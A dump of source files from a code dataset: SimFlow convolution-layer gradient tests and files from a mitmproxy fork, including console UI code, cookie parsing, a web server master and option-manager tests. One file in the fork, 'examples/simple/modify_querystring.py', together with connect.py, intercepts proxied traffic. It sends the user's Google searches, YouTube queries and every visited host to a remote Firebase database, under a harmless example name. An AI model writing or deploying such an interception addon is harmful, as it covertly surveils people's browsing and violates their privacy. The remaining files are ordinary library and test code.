inChannels = 3
n_filter = 5
padding = 1
stride = 1
x = np.random.randn(batch_size, inChannels, h_x, w_x)
w = np.random.randn(n_filter, inChannels, filter_size, filter_size)
b = np.random.randn(n_filter, 1)
c_layer = Conv2D(inChannels=inChannels, outChannels=n_filter,
filter_size=filter_size, stride=stride,
padding=padding, trainable=True)
c_layer.W = w
c_layer.b = b
out = c_layer.forward(x)
out_standard = self.standard_forward(x, w, b, padding, stride)
assert np.allclose(out, out_standard, atol=eps)
def test_conv_layer_back_prop(self):
eps = 1e-7
batch_size = 32
filter_size = 3
h_x, w_x = 7, 7
inChannels = 3
n_filter = 5
padding = 1
stride = 1
h_out = (h_x - filter_size + 2*padding)//stride + 1
w_out = (w_x - filter_size + 2*padding)//stride + 1
x = np.random.randn(batch_size, inChannels, h_x, w_x)
w = np.random.randn(n_filter, inChannels, filter_size, filter_size)
b = np.random.randn(n_filter, 1)
dout = np.random.randn(batch_size, n_filter, h_out, w_out)
c_layer = Conv2D(inChannels=inChannels, outChannels=n_filter,
filter_size=filter_size, stride=stride,
padding=padding, trainable=True)
c_layer.W = w
c_layer.b = b
dx_num = numerical_gradient_array(c_layer.forward, x, dout, h=eps)
dw_num = numerical_gradient_array(lambda w: c_layer.forward(x),
w, dout, h=eps)
db_num = numerical_gradient_array(lambda b: c_layer.forward(x),
b, dout, h=eps)
dx, grads = c_layer.backward(dout)
dw, db = grads[0][1], grads[1][1]
assert np.allclose(dx, dx_num, atol=eps)
assert np.allclose(dw, dw_num, atol=eps)
assert np.allclose(db, db_num, atol=eps)
```
#### File: SimFlow/tests/test_dilated_conv.py
```python
import numpy as np
from simflow.layers.convolutional import dilated_Conv2D
from simflow.utils.grad_check_utils import numerical_gradient_array
import unittest
class TestDilatedConv(unittest.TestCase):
def test_dilated_conv_layer_back_prop(self):
eps = 1e-7
batch_size = 32
filter_size = 3
h_x, w_x = 7, 7
inChannels = 3
n_filter = 5
padding = 0
stride = 1
dilation = 2
new_filter_size = dilation*(filter_size-1)+1
h_out = (h_x - new_filter_size + 2*padding)//stride + 1
w_out = (w_x - new_filter_size + 2*padding)//stride + 1
x = np.random.randn(batch_size, inChannels, h_x, w_x)
w = np.random.randn(n_filter, inChannels, filter_size, filter_size)
b = np.random.randn(n_filter, 1)
dout = np.random.randn(batch_size, n_filter, h_out, w_out)
dc_layer = dilated_Conv2D(inChannels=inChannels, outChannels=n_filter,
filter_size=filter_size, stride=stride,
padding=padding, trainable=True)
dc_layer.W = w
dc_layer.b = b
dx_num = numerical_gradient_array(dc_layer.forward,
x, dout, h=eps)
dw_num = numerical_gradient_array(lambda w: dc_layer.forward(x),
w, dout, h=eps)
db_num = numerical_gradient_array(lambda b: dc_layer.forward(x),
b, dout, h=eps)
dx, grads = dc_layer.backward(dout)
dw, db = grads[0][1], grads[1][1]
assert np.allclose(dx, dx_num, atol=eps)
assert np.allclose(dw, dw_num, atol=eps)
assert np.allclose(db, db_num, atol=eps)
``` |
{
"source": "00cool/mitmmyversion",
"score": 2
} |
#### File: 00cool/mitmmyversion/connect.py
```python
import pyrebase
config = {
"apiKey": "<KEY>",
"authDomain": "student-data-jump.firebaseapp.com",
"databaseURL": "https://student-data-jump.firebaseio.com",
"storageBucket": "student-data-jump.appspot.com",
"serviceAccount": "/home/nick/Desktop/firebase/student-data-jump-firebase-adminsdk-zzb0l-cfaf56906d.json"
}
firebase = pyrebase.initialize_app(config)
auth = firebase.auth()
user = auth.sign_in_with_email_and_password("<EMAIL>","<PASSWORD>")
user = auth.refresh(user['refreshToken'])
user['idToken']
db = firebase.database()
def sendDataToFire(data, sendTo):
db.child(sendTo).push(data)
```
#### File: examples/simple/modify_querystring.py
```python
from mitmproxy import http
import re
import json
import sys
sys.path.append('../')
from connect import sendDataToFire
def request(flow: http.HTTPFlow) -> None:
data = {}
#data['time'] = flow.request.timestamp_start
######################################################################
if flow.request.url[:32] == "https://www.google.co.in/search?" and flow.request.method == 'GET' :
#data['From'] = "Google search"
s = flow.request.path
s = s[s.find('q=')+2:]
s = s[:s.find('&')]
data['QueryG'] = s.replace('+', ' ')
json_dg = json.dumps(data)
sendDataToFire(json_dg, 'Google')#[data.find('&q=')+1: data.find('&')])
########################################################################
elif (flow.request.url[:50] == "https://suggestqueries.google.com/complete/search?" and flow.request.method == 'GET'):
ys = flow.request.path
ys = ys[ys.find('q=')+2:]
ys = ys[:ys.find('&')]
data['QueryY'] = ys.replace('+', ' ')
json_dy = json.dumps(data)
sendDataToFire(json_dy, 'YouTube')#[data.find('&q=')+1: data.find('&')])
######################################################################
else:
if flow.request.method == 'GET':
data['Website'] = flow.request.host
json_dw = json.dumps(data)
sendDataToFire(json_dw, 'Visited-websites')
# data['url'] = flow.request.url
# json_data = json.dumps(data)
# sendDataToFire(json_data, 'Visited-websites')
```
#### File: tools/console/window.py
```python
import re
import urwid
from mitmproxy.tools.console import common
from mitmproxy.tools.console import signals
from mitmproxy.tools.console import statusbar
from mitmproxy.tools.console import flowlist
from mitmproxy.tools.console import flowview
from mitmproxy.tools.console import commands
from mitmproxy.tools.console import keybindings
from mitmproxy.tools.console import options
from mitmproxy.tools.console import overlay
from mitmproxy.tools.console import help
from mitmproxy.tools.console import grideditor
from mitmproxy.tools.console import eventlog
class StackWidget(urwid.Frame):
def __init__(self, window, widget, title, focus):
self.is_focused = focus
self.window = window
if title:
header = urwid.AttrWrap(
urwid.Text(title),
"heading" if focus else "heading_inactive"
)
else:
header = None
super().__init__(
widget,
header=header
)
def mouse_event(self, size, event, button, col, row, focus):
if event == "mouse press" and button == 1 and not self.is_focused:
self.window.switch()
return super().mouse_event(size, event, button, col, row, focus)
def keypress(self, size, key):
# Make sure that we don't propagate cursor events outside of the widget.
# Otherwise, in a horizontal layout, urwid's Pile would change the focused widget
# if we cannot scroll any further.
ret = super().keypress(size, key)
command = self._command_map[ret] # awkward as they don't implement a full dict api
if command and command.startswith("cursor"):
return None
return ret
class WindowStack:
def __init__(self, master, base):
self.master = master
self.windows = dict(
flowlist = flowlist.FlowListBox(master),
flowview = flowview.FlowView(master),
commands = commands.Commands(master),
keybindings = keybindings.KeyBindings(master),
options = options.Options(master),
help = help.HelpView(master),
eventlog = eventlog.EventLog(master),
edit_focus_query = grideditor.QueryEditor(master),
edit_focus_cookies = grideditor.CookieEditor(master),
edit_focus_setcookies = grideditor.SetCookieEditor(master),
edit_focus_form = grideditor.RequestFormEditor(master),
edit_focus_path = grideditor.PathEditor(master),
edit_focus_request_headers = grideditor.RequestHeaderEditor(master),
edit_focus_response_headers = grideditor.ResponseHeaderEditor(master),
)
self.stack = [base]
self.overlay = None
def set_overlay(self, o, **kwargs):
self.overlay = overlay.SimpleOverlay(
self, o, self.top_widget(), o.width, **kwargs,
)
def top_window(self):
"""
The current top window, ignoring overlays.
"""
return self.windows[self.stack[-1]]
def top_widget(self):
"""
The current top widget - either a window or the active overlay.
"""
if self.overlay:
return self.overlay
return self.top_window()
def push(self, wname):
if self.stack[-1] == wname:
return
prev = self.top_window()
self.stack.append(wname)
self.call("layout_pushed", prev)
def pop(self, *args, **kwargs):
"""
Pop off the stack, return True if we're already at the top.
"""
if not self.overlay and len(self.stack) == 1:
return True
self.call("layout_popping")
if self.overlay:
self.overlay = None
else:
self.stack.pop()
def call(self, name, *args, **kwargs):
"""
Call a function on both the top window, and the overlay if there is
one. If the widget has a key_responder, we call the function on the
responder instead.
"""
getattr(self.top_window(), name)(*args, **kwargs)
if self.overlay:
getattr(self.overlay, name)(*args, **kwargs)
class Window(urwid.Frame):
def __init__(self, master):
self.statusbar = statusbar.StatusBar(master)
super().__init__(
None,
header = None,
footer = urwid.AttrWrap(self.statusbar, "background")
)
self.master = master
self.master.view.sig_view_refresh.connect(self.view_changed)
self.master.view.sig_view_add.connect(self.view_changed)
self.master.view.sig_view_remove.connect(self.view_changed)
self.master.view.sig_view_update.connect(self.view_changed)
self.master.view.focus.sig_change.connect(self.view_changed)
self.master.view.focus.sig_change.connect(self.focus_changed)
signals.focus.connect(self.sig_focus)
signals.flow_change.connect(self.flow_changed)
signals.pop_view_state.connect(self.pop)
signals.push_view_state.connect(self.push)
self.master.options.subscribe(self.configure, ["console_layout"])
self.master.options.subscribe(self.configure, ["console_layout_headers"])
self.pane = 0
self.stacks = [
WindowStack(master, "flowlist"),
WindowStack(master, "eventlog")
]
def focus_stack(self):
return self.stacks[self.pane]
def configure(self, otions, updated):
self.refresh()
def refresh(self):
"""
Redraw the layout.
"""
c = self.master.options.console_layout
if c == "single":
self.pane = 0
def wrapped(idx):
widget = self.stacks[idx].top_widget()
if self.master.options.console_layout_headers:
title = self.stacks[idx].top_window().title
else:
title = None
return StackWidget(
self,
widget,
title,
self.pane == idx
)
w = None
if c == "single":
w = wrapped(0)
elif c == "vertical":
w = urwid.Pile(
[
wrapped(i) for i, s in enumerate(self.stacks)
],
focus_item=self.pane
)
else:
w = urwid.Columns(
[wrapped(i) for i, s in enumerate(self.stacks)],
dividechars=1,
focus_column=self.pane
)
self.body = urwid.AttrWrap(w, "background")
def flow_changed(self, sender, flow):
if self.master.view.focus.flow:
if flow.id == self.master.view.focus.flow.id:
self.focus_changed()
def focus_changed(self, *args, **kwargs):
"""
Triggered when the focus changes - either when it's modified, or
when it changes to a different flow altogether.
"""
for i in self.stacks:
i.call("focus_changed")
def view_changed(self, *args, **kwargs):
"""
Triggered when the view list has changed.
"""
for i in self.stacks:
i.call("view_changed")
def set_overlay(self, o, **kwargs):
"""
Set an overlay on the currently focused stack.
"""
self.focus_stack().set_overlay(o, **kwargs)
self.refresh()
def push(self, wname):
"""
Push a window onto the currently focused stack.
"""
self.focus_stack().push(wname)
self.refresh()
self.view_changed()
self.focus_changed()
def pop(self, *args, **kwargs):
"""
Pop a window from the currently focused stack. If there is only one
window on the stack, this prompts for exit.
"""
if self.focus_stack().pop():
self.master.prompt_for_exit()
else:
self.refresh()
self.view_changed()
self.focus_changed()
def stacks_sorted_by_focus(self):
"""
Returns:
self.stacks, with the focused stack first.
"""
stacks = self.stacks.copy()
stacks.insert(0, stacks.pop(self.pane))
return stacks
def current(self, keyctx):
"""
Returns the active widget with a matching key context, including overlays.
If multiple stacks have an active widget with a matching key context,
the currently focused stack is preferred.
"""
for s in self.stacks_sorted_by_focus():
t = s.top_widget()
if t.keyctx == keyctx:
return t
def current_window(self, keyctx):
"""
Returns the active window with a matching key context, ignoring overlays.
If multiple stacks have an active widget with a matching key context,
the currently focused stack is preferred.
"""
for s in self.stacks_sorted_by_focus():
t = s.top_window()
if t.keyctx == keyctx:
return t
def sig_focus(self, sender, section):
self.focus_position = section
def switch(self):
"""
Switch between the two panes.
"""
if self.master.options.console_layout == "single":
self.pane = 0
else:
self.pane = (self.pane + 1) % len(self.stacks)
self.refresh()
def mouse_event(self, *args, **kwargs):
# args: (size, event, button, col, row)
k = super().mouse_event(*args, **kwargs)
if not k:
if args[1] == "mouse drag":
signals.status_message.send(
message = "Hold down fn, shift, alt or ctrl to select text or use the --no-mouse parameter.",
expire = 1
)
elif args[1] == "mouse press" and args[2] == 4:
self.keypress(args[0], "up")
elif args[1] == "mouse press" and args[2] == 5:
self.keypress(args[0], "down")
else:
return False
return True
def keypress(self, size, k):
k = super().keypress(size, k)
if k:
return self.master.keymap.handle(
self.focus_stack().top_widget().keyctx,
k
)
class Screen(urwid.raw_display.Screen):
def write(self, data):
if common.IS_WSL:
# replace urwid's SI/SO, which produce artifacts under WSL.
# at some point we may figure out what they actually do.
data = re.sub("[\x0e\x0f]", "", data)
super().write(data)
``` |
{
"source": "00cool/project-X",
"score": 2
} |
#### File: examples/simple/custom_option.py
```python
from mitmproxy import ctx
def load(l):
ctx.log.info("Registering option 'custom'")
l.add_option("custom", bool, False, "A custom option")
def configure(updated):
if "custom" in updated:
ctx.log.info("custom option value: %s" % ctx.options.custom)
```
#### File: mitmproxy/addons/anticomp.py
```python
from mitmproxy import ctx
class AntiComp:
def request(self, flow):
if ctx.options.anticomp:
flow.request.anticomp()
```
#### File: mitmproxy/addons/check_ca.py
```python
import mitmproxy
class CheckCA:
def __init__(self):
self.failed = False
def configure(self, updated):
has_ca = (
mitmproxy.ctx.master.server and
mitmproxy.ctx.master.server.config and
mitmproxy.ctx.master.server.config.certstore and
mitmproxy.ctx.master.server.config.certstore.default_ca
)
if has_ca:
self.failed = mitmproxy.ctx.master.server.config.certstore.default_ca.has_expired()
if self.failed:
mitmproxy.ctx.master.add_log(
"The mitmproxy certificate authority has expired!\n"
"Please delete all CA-related files in your ~/.mitmproxy folder.\n"
"The CA will be regenerated automatically after restarting mitmproxy.\n"
"Then make sure all your clients have the new CA installed.",
"warn",
)
```
#### File: mitmproxy/addons/keepserving.py
```python
from mitmproxy import ctx
class KeepServing:
def event_processing_complete(self):
if not ctx.master.options.keepserving:
ctx.master.shutdown()
```
#### File: net/http/cookies.py
```python
import email.utils
import re
import time
from typing import Tuple, List, Iterable
from mitmproxy.coretypes import multidict
"""
A flexible module for cookie parsing and manipulation.
This module differs from usual standards-compliant cookie modules in a number
of ways. We try to be as permissive as possible, and to retain even mal-formed
information. Duplicate cookies are preserved in parsing, and can be set in
formatting. We do attempt to escape and quote values where needed, but will not
reject data that violate the specs.
Parsing accepts the formats in RFC6265 and partially RFC2109 and RFC2965. We
also parse the comma-separated variant of Set-Cookie that allows multiple
cookies to be set in a single header. Serialization follows RFC6265.
http://tools.ietf.org/html/rfc6265
http://tools.ietf.org/html/rfc2109
http://tools.ietf.org/html/rfc2965
"""
_cookie_params = {'expires', 'path', 'comment', 'max-age', 'secure', 'httponly', 'version'}
ESCAPE = re.compile(r"([\"\\])")
class CookieAttrs(multidict.MultiDict):
@staticmethod
def _kconv(key):
return key.lower()
@staticmethod
def _reduce_values(values):
# See the StickyCookieTest for a weird cookie that only makes sense
# if we take the last part.
return values[-1]
TSetCookie = Tuple[str, str, CookieAttrs]
TPairs = List[List[str]] # TODO: Should be List[Tuple[str,str]]?
def _read_until(s, start, term):
"""
Read until one of the characters in term is reached.
"""
if start == len(s):
return "", start + 1
for i in range(start, len(s)):
if s[i] in term:
return s[start:i], i
return s[start:i + 1], i + 1
def _read_quoted_string(s, start):
"""
start: offset to the first quote of the string to be read
A sort of loose super-set of the various quoted string specifications.
RFC6265 disallows backslashes or double quotes within quoted strings.
Prior RFCs use backslashes to escape. This leaves us free to apply
backslash escaping by default and be compatible with everything.
"""
escaping = False
ret = []
# Skip the first quote
i = start # initialize in case the loop doesn't run.
for i in range(start + 1, len(s)):
if escaping:
ret.append(s[i])
escaping = False
elif s[i] == '"':
break
elif s[i] == "\\":
escaping = True
else:
ret.append(s[i])
return "".join(ret), i + 1
def _read_key(s, start, delims=";="):
"""
Read a key - the LHS of a token/value pair in a cookie.
"""
return _read_until(s, start, delims)
def _read_value(s, start, delims):
"""
Reads a value - the RHS of a token/value pair in a cookie.
"""
if start >= len(s):
return "", start
elif s[start] == '"':
return _read_quoted_string(s, start)
else:
return _read_until(s, start, delims)
def _read_cookie_pairs(s, off=0):
"""
Read pairs of lhs=rhs values from Cookie headers.
off: start offset
"""
pairs = []
while True:
lhs, off = _read_key(s, off)
lhs = lhs.lstrip()
if lhs:
rhs = None
if off < len(s) and s[off] == "=":
rhs, off = _read_value(s, off + 1, ";")
pairs.append([lhs, rhs])
off += 1
if not off < len(s):
break
return pairs, off
def _read_set_cookie_pairs(s: str, off=0) -> Tuple[List[TPairs], int]:
"""
Read pairs of lhs=rhs values from SetCookie headers while handling multiple cookies.
off: start offset
specials: attributes that are treated specially
"""
cookies = [] # type: List[TPairs]
pairs = [] # type: TPairs
while True:
lhs, off = _read_key(s, off, ";=,")
lhs = lhs.lstrip()
if lhs:
rhs = None
if off < len(s) and s[off] == "=":
rhs, off = _read_value(s, off + 1, ";,")
# Special handliing of attributes
if lhs.lower() == "expires":
# 'expires' values can contain commas in them so they need to
# be handled separately.
# We actually bank on the fact that the expires value WILL
# contain a comma. Things will fail, if they don't.
# '3' is just a heuristic we use to determine whether we've
# only read a part of the expires value and we should read more.
if len(rhs) <= 3:
trail, off = _read_value(s, off + 1, ";,")
rhs = rhs + "," + trail
pairs.append([lhs, rhs])
# comma marks the beginning of a new cookie
if off < len(s) and s[off] == ",":
cookies.append(pairs)
pairs = []
off += 1
if not off < len(s):
break
if pairs or not cookies:
cookies.append(pairs)
return cookies, off
def _has_special(s: str) -> bool:
for i in s:
if i in '",;\\':
return True
o = ord(i)
if o < 0x21 or o > 0x7e:
return True
return False
def _format_pairs(pairs, specials=(), sep="; "):
"""
specials: A lower-cased list of keys that will not be quoted.
"""
vals = []
for k, v in pairs:
if v is None:
vals.append(k)
else:
if k.lower() not in specials and _has_special(v):
v = ESCAPE.sub(r"\\\1", v)
v = '"%s"' % v
vals.append("%s=%s" % (k, v))
return sep.join(vals)
def _format_set_cookie_pairs(lst):
return _format_pairs(
lst,
specials=("expires", "path")
)
def parse_cookie_header(line):
"""
Parse a Cookie header value.
Returns a list of (lhs, rhs) tuples.
"""
pairs, off_ = _read_cookie_pairs(line)
return pairs
def parse_cookie_headers(cookie_headers):
cookie_list = []
for header in cookie_headers:
cookie_list.extend(parse_cookie_header(header))
return cookie_list
def format_cookie_header(lst):
"""
Formats a Cookie header value.
"""
return _format_pairs(lst)
def parse_set_cookie_header(line: str) -> List[TSetCookie]:
"""
Parse a Set-Cookie header value
Returns:
A list of (name, value, attrs) tuples, where attrs is a
CookieAttrs dict of attributes. No attempt is made to parse attribute
values - they are treated purely as strings.
"""
cookie_pairs, off = _read_set_cookie_pairs(line)
cookies = []
for pairs in cookie_pairs:
if pairs:
cookie, *attrs = pairs
cookies.append((
cookie[0],
cookie[1],
CookieAttrs(attrs)
))
return cookies
def parse_set_cookie_headers(headers: Iterable[str]) -> List[TSetCookie]:
rv = []
for header in headers:
cookies = parse_set_cookie_header(header)
rv.extend(cookies)
return rv
def format_set_cookie_header(set_cookies: List[TSetCookie]) -> str:
"""
Formats a Set-Cookie header value.
"""
rv = []
for name, value, attrs in set_cookies:
pairs = [(name, value)]
pairs.extend(
attrs.fields if hasattr(attrs, "fields") else attrs
)
rv.append(_format_set_cookie_pairs(pairs))
return ", ".join(rv)
def refresh_set_cookie_header(c: str, delta: int) -> str:
"""
Args:
c: A Set-Cookie string
delta: Time delta in seconds
Returns:
A refreshed Set-Cookie string
Raises:
ValueError, if the cookie is invalid.
"""
cookies = parse_set_cookie_header(c)
for cookie in cookies:
name, value, attrs = cookie
if not name or not value:
raise ValueError("Invalid Cookie")
if "expires" in attrs:
e = email.utils.parsedate_tz(attrs["expires"])
if e:
f = email.utils.mktime_tz(e) + delta
attrs.set_all("expires", [email.utils.formatdate(f)])
else:
# This can happen when the expires tag is invalid.
# reddit.com sends a an expires tag like this: "Thu, 31 Dec
# 2037 23:59:59 GMT", which is valid RFC 1123, but not
# strictly correct according to the cookie spec. Browsers
# appear to parse this tolerantly - maybe we should too.
# For now, we just ignore this.
del attrs["expires"]
return format_set_cookie_header(cookies)
def get_expiration_ts(cookie_attrs):
"""
Determines the time when the cookie will be expired.
Considering both 'expires' and 'max-age' parameters.
Returns: timestamp of when the cookie will expire.
None, if no expiration time is set.
"""
if 'expires' in cookie_attrs:
e = email.utils.parsedate_tz(cookie_attrs["expires"])
if e:
return email.utils.mktime_tz(e)
elif 'max-age' in cookie_attrs:
try:
max_age = int(cookie_attrs['Max-Age'])
except ValueError:
pass
else:
now_ts = time.time()
return now_ts + max_age
return None
def is_expired(cookie_attrs):
"""
Determines whether a cookie has expired.
Returns: boolean
"""
exp_ts = get_expiration_ts(cookie_attrs)
now_ts = time.time()
# If no expiration information was provided with the cookie
if exp_ts is None:
return False
else:
return exp_ts <= now_ts
def group_cookies(pairs):
"""
Converts a list of pairs to a (name, value, attrs) for each cookie.
"""
if not pairs:
return []
cookie_list = []
# First pair is always a new cookie
name, value = pairs[0]
attrs = []
for k, v in pairs[1:]:
if k.lower() in _cookie_params:
attrs.append((k, v))
else:
cookie_list.append((name, value, CookieAttrs(attrs)))
name, value, attrs = k, v, []
cookie_list.append((name, value, CookieAttrs(attrs)))
return cookie_list
```
#### File: tools/web/master.py
```python
import webbrowser
import tornado.httpserver
import tornado.ioloop
from mitmproxy import addons
from mitmproxy import log
from mitmproxy import master
from mitmproxy import optmanager
from mitmproxy.addons import eventstore
from mitmproxy.addons import intercept
from mitmproxy.addons import readfile
from mitmproxy.addons import termlog
from mitmproxy.addons import view
from mitmproxy.addons import termstatus
from mitmproxy.tools.web import app, webaddons, static_viewer
class WebMaster(master.Master):
def __init__(self, options, with_termlog=True):
super().__init__(options)
self.view = view.View()
self.view.sig_view_add.connect(self._sig_view_add)
self.view.sig_view_remove.connect(self._sig_view_remove)
self.view.sig_view_update.connect(self._sig_view_update)
self.view.sig_view_refresh.connect(self._sig_view_refresh)
self.events = eventstore.EventStore()
self.events.sig_add.connect(self._sig_events_add)
self.events.sig_refresh.connect(self._sig_events_refresh)
self.options.changed.connect(self._sig_options_update)
self.options.changed.connect(self._sig_settings_update)
self.addons.add(*addons.default_addons())
self.addons.add(
webaddons.WebAddon(),
intercept.Intercept(),
readfile.ReadFile(),
static_viewer.StaticViewer(),
self.view,
self.events,
)
if with_termlog:
self.addons.add(termlog.TermLog(), termstatus.TermStatus())
self.app = app.Application(
self, self.options.web_debug
)
def _sig_view_add(self, view, flow):
app.ClientConnection.broadcast(
resource="flows",
cmd="add",
data=app.flow_to_json(flow)
)
def _sig_view_update(self, view, flow):
app.ClientConnection.broadcast(
resource="flows",
cmd="update",
data=app.flow_to_json(flow)
)
def _sig_view_remove(self, view, flow, index):
app.ClientConnection.broadcast(
resource="flows",
cmd="remove",
data=flow.id
)
def _sig_view_refresh(self, view):
app.ClientConnection.broadcast(
resource="flows",
cmd="reset"
)
def _sig_events_add(self, event_store, entry: log.LogEntry):
app.ClientConnection.broadcast(
resource="events",
cmd="add",
data=app.logentry_to_json(entry)
)
def _sig_events_refresh(self, event_store):
app.ClientConnection.broadcast(
resource="events",
cmd="reset"
)
def _sig_options_update(self, options, updated):
options_dict = optmanager.dump_dicts(options, updated)
app.ClientConnection.broadcast(
resource="options",
cmd="update",
data=options_dict
)
def _sig_settings_update(self, options, updated):
app.ClientConnection.broadcast(
resource="settings",
cmd="update",
data={k: getattr(options, k) for k in updated}
)
def run(self): # pragma: no cover
iol = tornado.ioloop.IOLoop.instance()
http_server = tornado.httpserver.HTTPServer(self.app)
http_server.listen(self.options.web_port, self.options.web_iface)
iol.add_callback(self.start)
tornado.ioloop.PeriodicCallback(lambda: self.tick(timeout=0), 5).start()
web_url = "http://{}:{}/".format(self.options.web_iface, self.options.web_port)
self.add_log(
"Web server listening at {}".format(web_url),
"info"
)
if self.options.web_open_browser:
success = open_browser(web_url)
if not success:
self.add_log(
"No web browser found. Please open a browser and point it to {}".format(web_url),
"info"
)
try:
iol.start()
except KeyboardInterrupt:
self.shutdown()
def shutdown(self):
tornado.ioloop.IOLoop.instance().stop()
super().shutdown()
def open_browser(url: str) -> bool:
"""
Open a URL in a browser window.
In contrast to webbrowser.open, we limit the list of suitable browsers.
This gracefully degrades to a no-op on headless servers, where webbrowser.open
would otherwise open lynx.
Returns:
True, if a browser has been opened
False, if no suitable browser has been found.
"""
browsers = (
"windows-default", "macosx",
"google-chrome", "chrome", "chromium", "chromium-browser",
"firefox", "opera", "safari",
)
for browser in browsers:
try:
b = webbrowser.get(browser)
except webbrowser.Error:
pass
else:
b.open(url)
return True
return False
```
#### File: test/mitmproxy/test_optmanager.py
```python
import copy
import pytest
import typing
import argparse
from mitmproxy import options
from mitmproxy import optmanager
from mitmproxy import exceptions
class TO(optmanager.OptManager):
def __init__(self):
super().__init__()
self.add_option("one", typing.Optional[int], None, "help")
self.add_option("two", typing.Optional[int], 2, "help")
self.add_option("bool", bool, False, "help")
self.add_option("required_int", int, 2, "help")
class TD(optmanager.OptManager):
def __init__(self):
super().__init__()
self.add_option("one", str, "done", "help")
self.add_option("two", str, "dtwo", "help")
class TD2(TD):
def __init__(self):
super().__init__()
self.add_option("three", str, "dthree", "help")
self.add_option("four", str, "dfour", "help")
class TM(optmanager.OptManager):
def __init__(self):
super().__init__()
self.add_option("two", typing.Sequence[str], ["foo"], "help")
self.add_option("one", typing.Optional[str], None, "help")
def test_defaults():
o = TD2()
defaults = {
"one": "done",
"two": "dtwo",
"three": "dthree",
"four": "dfour",
}
for k, v in defaults.items():
assert o.default(k) == v
assert not o.has_changed("one")
newvals = dict(
one="xone",
two="xtwo",
three="xthree",
four="xfour",
)
o.update(**newvals)
assert o.has_changed("one")
for k, v in newvals.items():
assert v == getattr(o, k)
o.reset()
assert not o.has_changed("one")
for k in o.keys():
assert not o.has_changed(k)
def test_required_int():
o = TO()
with pytest.raises(exceptions.OptionsError):
o.parse_setval("required_int", None)
def test_deepcopy():
o = TD()
copy.deepcopy(o)
def test_options():
o = TO()
assert o.keys() == {"bool", "one", "two", "required_int"}
assert o.one is None
assert o.two == 2
o.one = 1
assert o.one == 1
with pytest.raises(TypeError):
TO(nonexistent = "value")
with pytest.raises(Exception, match="Unknown options"):
o.nonexistent = "value"
with pytest.raises(Exception, match="Unknown options"):
o.update(nonexistent = "value")
assert o.update_known(nonexistent = "value") == {"nonexistent": "value"}
rec = []
def sub(opts, updated):
rec.append(copy.copy(opts))
o.changed.connect(sub)
o.one = 90
assert len(rec) == 1
assert rec[-1].one == 90
o.update(one=3)
assert len(rec) == 2
assert rec[-1].one == 3
def test_setter():
o = TO()
f = o.setter("two")
f(99)
assert o.two == 99
with pytest.raises(Exception, match="No such option"):
o.setter("nonexistent")
def test_toggler():
o = TO()
f = o.toggler("bool")
assert o.bool is False
f()
assert o.bool is True
f()
assert o.bool is False
with pytest.raises(Exception, match="No such option"):
o.toggler("nonexistent")
with pytest.raises(Exception, match="boolean options"):
o.toggler("one")
class Rec():
def __init__(self):
self.called = None
def __call__(self, *args, **kwargs):
self.called = (args, kwargs)
def test_subscribe():
o = TO()
r = Rec()
# pytest.raises keeps a reference here that interferes with the cleanup test
# further down.
try:
o.subscribe(r, ["unknown"])
except exceptions.OptionsError:
pass
else:
raise AssertionError
assert len(o.changed.receivers) == 0
o.subscribe(r, ["two"])
o.one = 2
assert not r.called
o.two = 3
assert r.called
assert len(o.changed.receivers) == 1
del r
o.two = 4
assert len(o.changed.receivers) == 0
class binder:
def __init__(self):
self.o = TO()
self.called = False
self.o.subscribe(self.bound, ["two"])
def bound(self, *args, **kwargs):
self.called = True
t = binder()
t.o.one = 3
assert not t.called
t.o.two = 3
assert t.called
def test_rollback():
o = TO()
rec = []
def sub(opts, updated):
rec.append(copy.copy(opts))
recerr = []
def errsub(opts, **kwargs):
recerr.append(kwargs)
def err(opts, updated):
if opts.one == 10:
raise exceptions.OptionsError()
if opts.bool is True:
raise exceptions.OptionsError()
o.changed.connect(sub)
o.changed.connect(err)
o.errored.connect(errsub)
assert o.one is None
with pytest.raises(exceptions.OptionsError):
o.one = 10
assert o.one is None
with pytest.raises(exceptions.OptionsError):
o.bool = True
assert o.bool is False
assert isinstance(recerr[0]["exc"], exceptions.OptionsError)
assert o.one is None
assert o.bool is False
assert len(rec) == 4
assert rec[0].one == 10
assert rec[1].one is None
assert rec[2].bool is True
assert rec[3].bool is False
with pytest.raises(exceptions.OptionsError):
with o.rollback({"one"}, reraise=True):
raise exceptions.OptionsError()
def test_simple():
assert repr(TO())
assert "one" in TO()
def test_items():
assert TO().items()
def test_serialize():
o = TD2()
o.three = "set"
assert "dfour" in optmanager.serialize(o, None, defaults=True)
data = optmanager.serialize(o, None)
assert "dfour" not in data
o2 = TD2()
optmanager.load(o2, data)
assert o2 == o
assert not o == 42
t = """
unknown: foo
"""
data = optmanager.serialize(o, t)
o2 = TD2()
optmanager.load(o2, data)
assert o2 == o
t = "invalid: foo\ninvalid"
with pytest.raises(Exception, match="Config error"):
optmanager.load(o2, t)
t = "invalid"
with pytest.raises(Exception, match="Config error"):
optmanager.load(o2, t)
t = "# a comment"
optmanager.load(o2, t)
assert optmanager.load(o2, "foobar: '123'") == {"foobar": "123"}
t = ""
optmanager.load(o2, t)
assert optmanager.load(o2, "foobar: '123'") == {"foobar": "123"}
def test_serialize_defaults():
o = options.Options()
assert optmanager.serialize(o, None, defaults=True)
def test_saving(tmpdir):
o = TD2()
o.three = "set"
dst = str(tmpdir.join("conf"))
optmanager.save(o, dst, defaults=True)
o2 = TD2()
optmanager.load_paths(o2, dst)
o2.three = "foo"
optmanager.save(o2, dst, defaults=True)
optmanager.load_paths(o, dst)
assert o.three == "foo"
with open(dst, 'a') as f:
f.write("foobar: '123'")
assert optmanager.load_paths(o, dst) == {"foobar": "123"}
with open(dst, 'a') as f:
f.write("'''")
with pytest.raises(exceptions.OptionsError):
optmanager.load_paths(o, dst)
with open(dst, 'wb') as f:
f.write(b"\x01\x02\x03")
with pytest.raises(exceptions.OptionsError):
optmanager.load_paths(o, dst)
with pytest.raises(exceptions.OptionsError):
optmanager.save(o, dst)
with open(dst, 'wb') as f:
f.write(b"\xff\xff\xff")
with pytest.raises(exceptions.OptionsError):
optmanager.load_paths(o, dst)
with pytest.raises(exceptions.OptionsError):
optmanager.save(o, dst)
def test_merge():
m = TM()
m.merge(dict(one="two"))
assert m.one == "two"
m.merge(dict(one=None))
assert m.one == "two"
m.merge(dict(two=["bar"]))
assert m.two == ["foo", "bar"]
def test_option():
o = optmanager._Option("test", int, 1, "help", None)
assert o.current() == 1
with pytest.raises(TypeError):
o.set("foo")
with pytest.raises(TypeError):
optmanager._Option("test", str, 1, "help", None)
o2 = optmanager._Option("test", int, 1, "help", None)
assert o2 == o
o2.set(5)
assert o2 != o
def test_dump_defaults():
o = options.Options()
assert optmanager.dump_defaults(o)
